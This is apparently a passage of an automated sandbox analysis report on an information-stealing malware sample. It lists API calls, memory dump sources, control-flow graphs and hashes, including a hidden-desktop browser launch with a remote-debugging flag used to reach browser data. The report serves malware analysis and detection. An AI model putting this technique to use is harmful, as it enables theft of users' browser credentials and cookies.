                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowswsprintf
                                  • String ID: :\$C
                                  • API String ID: 1325379522-3309953409
                                  • Opcode ID: 08b8030ffece6fd6b41c8ca882f6bbd7feb0cabc65cb2c779eaeec9d2df60198
                                  • Instruction ID: a0827ecf4ae38c2c33fdd33bf5484baa062ab9bfe400a915f82d6bbce5e750c2
                                  • Opcode Fuzzy Hash: 08b8030ffece6fd6b41c8ca882f6bbd7feb0cabc65cb2c779eaeec9d2df60198
                                  • Instruction Fuzzy Hash: DE316FB1D482499FCB14CFB89989AEEBFBCFF5C710F10416AE505E7650E6349A408BA1

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc
                                  • String ID:
                                  • API String ID: 190572456-0
                                  • Opcode ID: 688e6d35e2a07d63d7563ec6ef8ec09139a5276153d4ba185559e42ce65944c1
                                  • Instruction ID: faa2bb45cfff8c8a066dcfdb7f03aa7be5bda38bcdc7b397fbb0a142ea15229e
                                  • Opcode Fuzzy Hash: 688e6d35e2a07d63d7563ec6ef8ec09139a5276153d4ba185559e42ce65944c1
                                  • Instruction Fuzzy Hash: 74315031A006569FCB21BBB9CC85B9E7BAEBF41740B444435F405D72A2DF70EC058791

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2035 8e4ae0-8e4aee 2036 8e4af0-8e4af5 2035->2036 2036->2036 2037 8e4af7-8e4b68 ??2@YAPAXI@Z * 3 lstrlenA InternetCrackUrlA call 8e2930 2036->2037
                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT(00000800,010CD718), ref: 008E4B17
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 008E4B21
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 008E4B2B
                                  • lstrlenA.KERNEL32(?,00000000,?), ref: 008E4B3F
                                  • InternetCrackUrlA.WININET(?,00000000), ref: 008E4B47
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??2@$CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1683549937-4251816714
                                  • Opcode ID: 6e29a0424f56f74ad5810ed898c2151ba07639bc9528fa2fdcf7dd4eba95b151
                                  • Instruction ID: 672731011e5ba6fe4ee7f8bc3b3d8256b970b69860237ccf83d2e61bb1d22f9f
                                  • Opcode Fuzzy Hash: 6e29a0424f56f74ad5810ed898c2151ba07639bc9528fa2fdcf7dd4eba95b151
                                  • Instruction Fuzzy Hash: 1C011B71D00218ABDB00DFA9E845B9EBBB8FB09320F008126F914E7290DF7459058BD4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2045 902820-90284e GetProcessHeap HeapAlloc call 9028b0 2048 902850-902859 2045->2048 2049 90285a-902879 RegOpenKeyExA 2045->2049 2050 902892-9028a2 RegCloseKey 2049->2050 2051 90287b-90288c RegQueryValueExA 2049->2051 2051->2050
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00902835
                                  • HeapAlloc.KERNEL32(00000000), ref: 0090283C
                                    • Part of subcall function 009028B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 009028C5
                                    • Part of subcall function 009028B0: HeapAlloc.KERNEL32(00000000), ref: 009028CC
                                    • Part of subcall function 009028B0: RegOpenKeyExA.KERNEL32(80000002,010CA508,00000000,00020119,00902849), ref: 009028EB
                                    • Part of subcall function 009028B0: RegQueryValueExA.KERNEL32(00902849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00902905
                                    • Part of subcall function 009028B0: RegCloseKey.ADVAPI32(00902849), ref: 0090290F
                                  • RegOpenKeyExA.KERNEL32(80000002,010CA508,00000000,00020119,?), ref: 00902871
                                  • RegQueryValueExA.KERNEL32(?,010D0000,00000000,00000000,00000000,000000FF), ref: 0090288C
                                  • RegCloseKey.ADVAPI32(?), ref: 00902896
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3466090806-2517555085
                                  • Opcode ID: 6d415f6875a57dec013cbfa0960e28346b3b37ec5593d9f892844b68ee711b58
                                  • Instruction ID: 65932b5bab53ae03f38a4e442f2ac826374430e486206c4cba9f565935032394
                                  • Opcode Fuzzy Hash: 6d415f6875a57dec013cbfa0960e28346b3b37ec5593d9f892844b68ee711b58
                                  • Instruction Fuzzy Hash: 2401A275A00218BFD7109BA4AC4DFEA777DEB44711F408158FE08D7290DE705A4187A0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2052 8fefe0-8ff005 call 8e2840 2055 8ff019-8ff01d call 8e6b80 2052->2055 2056 8ff007-8ff00f 2052->2056 2059 8ff022-8ff038 StrCmpCA 2055->2059 2056->2055 2058 8ff011-8ff013 lstrcpy 2056->2058 2058->2055 2060 8ff03a-8ff052 call 8e2930 call 8e2840 2059->2060 2061 8ff061-8ff068 call 8e2930 2059->2061 2070 8ff095-8ff0f0 call 8e2930 * 10 2060->2070 2071 8ff054-8ff05c 2060->2071 2067 8ff070-8ff078 2061->2067 2067->2067 2069 8ff07a-8ff087 call 8e2840 2067->2069 2069->2070 2076 8ff089 2069->2076 2071->2070 2075 8ff05e-8ff05f 2071->2075 2078 8ff08e-8ff08f lstrcpy 2075->2078 2076->2078 2078->2070
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008FF013
                                  • StrCmpCA.SHLWAPI(?,ERROR,?,?,?,?,?,?,?,?,?,008FF54D), ref: 008FF02E
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 008FF08F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: ERROR
                                  • API String ID: 3722407311-2861137601
                                  • Opcode ID: 4284024aeb017d750c8084cb21c793da4cfe40004dbfef3a070a94744f56fca7
                                  • Instruction ID: 6e97a66df578073941a23c1c8c194b1b6f5e21bb1bd8a5f66cdc3f12801478a0
                                  • Opcode Fuzzy Hash: 4284024aeb017d750c8084cb21c793da4cfe40004dbfef3a070a94744f56fca7
                                  • Instruction Fuzzy Hash: FF213030A1068A9BCB20BF7ECC46AAA3BA8FF45704F404524B989DB213DF70DD618791

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2097 902a70-902ac2 GetProcessHeap HeapAlloc GetComputerNameA 2098 902ae4-902af9 2097->2098 2099 902ac4-902ad6 2097->2099
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00902A9F
                                  • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00902AA6
                                  • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00902ABA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocComputerNameProcess
                                  • String ID:
                                  • API String ID: 4203777966-0
                                  • Opcode ID: 081886a7eccee13d8c6bee23bd2a81c1b2c946a2dfff4ffa0bca8b9c6cb914c7
                                  • Instruction ID: 58930bfb2e50d999faf8ba8cfcd90069424a2c12e8f754613bc944d387d59974
                                  • Opcode Fuzzy Hash: 081886a7eccee13d8c6bee23bd2a81c1b2c946a2dfff4ffa0bca8b9c6cb914c7
                                  • Instruction Fuzzy Hash: 0D01AD72B44648ABDB10CF99EC49BAAB7ACF748B21F00426AE919D3780DB74590486A1
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008FEF62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 9ea47589f373369ee23705cf7b159f7e5bcd47020d5e0dbd7d498a930f58a3f5
                                  • Instruction ID: 36d8138684dd761eee0d2746b50b54b85171e41229491f6e801c8dd0fc39267b
                                  • Opcode Fuzzy Hash: 9ea47589f373369ee23705cf7b159f7e5bcd47020d5e0dbd7d498a930f58a3f5
                                  • Instruction Fuzzy Hash: 31119C706201895BDB24FF7ED846E9E3BA8FF42340F805124B988DB252DA74ED658792
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E602F
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E6082
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E60B5
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E60E5
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E6120
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E6153
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008E6163
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: bac2ee151e31d41d21cfbdab59ef7db24c0af15fbd81a25be5c6e99c54151ab3
                                  • Instruction ID: 8bc058fdadc22c4428ee5ab5cd83fed9e17cd343059bd07bc022d0fc2b8a200b
                                  • Opcode Fuzzy Hash: bac2ee151e31d41d21cfbdab59ef7db24c0af15fbd81a25be5c6e99c54151ab3
                                  • Instruction Fuzzy Hash: A4526D31D00296AFCB21ABB9CC49BAE7BB9FF45350F058024F905E7252DB74ED128B91
                                  APIs
                                  • memset.MSVCRT ref: 008E97C4
                                  • lstrcatA.KERNEL32(?,?), ref: 008E97D8
                                  • lstrcatA.KERNEL32(?,?), ref: 008E97ED
                                  • lstrcatA.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 008E9800
                                  • memset.MSVCRT ref: 008E9815
                                    • Part of subcall function 00903E10: lstrcpy.KERNEL32(00000000,0090D014), ref: 00903E45
                                    • Part of subcall function 00903E10: lstrcpy.KERNEL32(00000000,010C4B10), ref: 00903E6F
                                    • Part of subcall function 00903E10: GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,008E4D2A,?,00000014), ref: 00903E79
                                  • wsprintfA.USER32 ref: 008E9846
                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 008E9869
                                  • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 008E9888
                                  • memset.MSVCRT ref: 008E98A6
                                  • lstrcatA.KERNEL32(?,?,?,00000000,00000103), ref: 008E98BB
                                  • lstrcatA.KERNEL32(?,?), ref: 008E98CD
                                  • lstrcatA.KERNEL32(?,00915118), ref: 008E98DD
                                  • memset.MSVCRT ref: 008E98F2
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008E991A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E9950
                                  • StrStrA.SHLWAPI(?,010D0060), ref: 008E9965
                                  • lstrcpyn.KERNEL32(00B193D0,?,00000000), ref: 008E9982
                                  • lstrlenA.KERNEL32(?), ref: 008E9996
                                  • wsprintfA.USER32 ref: 008E99A6
                                  • lstrcpy.KERNEL32(?,?), ref: 008E99BD
                                  • memset.MSVCRT ref: 008E99D3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
